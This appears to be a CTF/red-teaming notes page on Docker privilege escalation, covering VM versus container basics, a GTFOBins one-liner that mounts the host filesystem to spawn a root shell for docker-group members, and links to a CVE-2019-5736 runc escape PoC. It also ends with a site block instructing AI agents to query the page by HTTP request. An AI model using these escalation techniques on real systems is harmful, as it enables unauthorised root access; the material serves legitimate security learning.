# Docker

## VM vs. Container

A virtual machine (VM) runs on a hypervisor (a kind of emulator that creates and runs VM). There are two types of hypervisors:

* **Physical layer** such as a server: Type-1, native or bare-metal hypervisors, such as: VMware ESXi, Microsoft Hyper-V and Xen.
* **Conventional OS**: Type-2 or hosted hypervisors, such as VMware Workstation or Oracle Virtualbox.

Each VM contains an application and an independent OS, and each docker container contains only an application. All docker containers share the same OS. This feature makes containers much more resource-efficient than VMs. Docker containers are typically smaller than 100 MB, where VMs are often larger than 10 GB.

## Docker Group

From GTFOBins:

![GTFOBins docker escape](/files/-Mg22Claz4qd-TWmwP1U)

If we are in the `docker` group, we can try to spawn a root shell using the following payload:

```bash
docker run -v /:/mnt --rm -it bash chroot /mnt sh
```

## RunC Exploit (CVE-2019-5736)

From HackTricks:

![Runc exploit - HackTricks](/files/-Mg22roDvqYKkHnmYrAn)

If `sudo -l` shows that we are able to run docker exec as root, then we can try to escape the docker container using **CVE-2019-5736**. The PoC is on Github:

{% embed url="<https://github.com/Frichetten/CVE-2019-5736-PoC>" %}
CVE-2019-5736 PoC
{% endembed %}

To learn more about the theory behind this PoC, read Dragon Sector's blog:

{% embed url="<https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html>" %}
CVE-2019-5736 - Dragon Sector
{% endembed %}

## Challenge: TryHackMe - UltraTech

{% embed url="<https://www.ctfwriteup.com/tryhackme/tcm-linux-privesc-course/ultratech-medium>" %}
TryHackMe - UltraTech
{% endembed %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ret2basic.gitbook.io/ctfnote/red-teaming/privilege-escalation/linux-privilege-escalation/docker.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.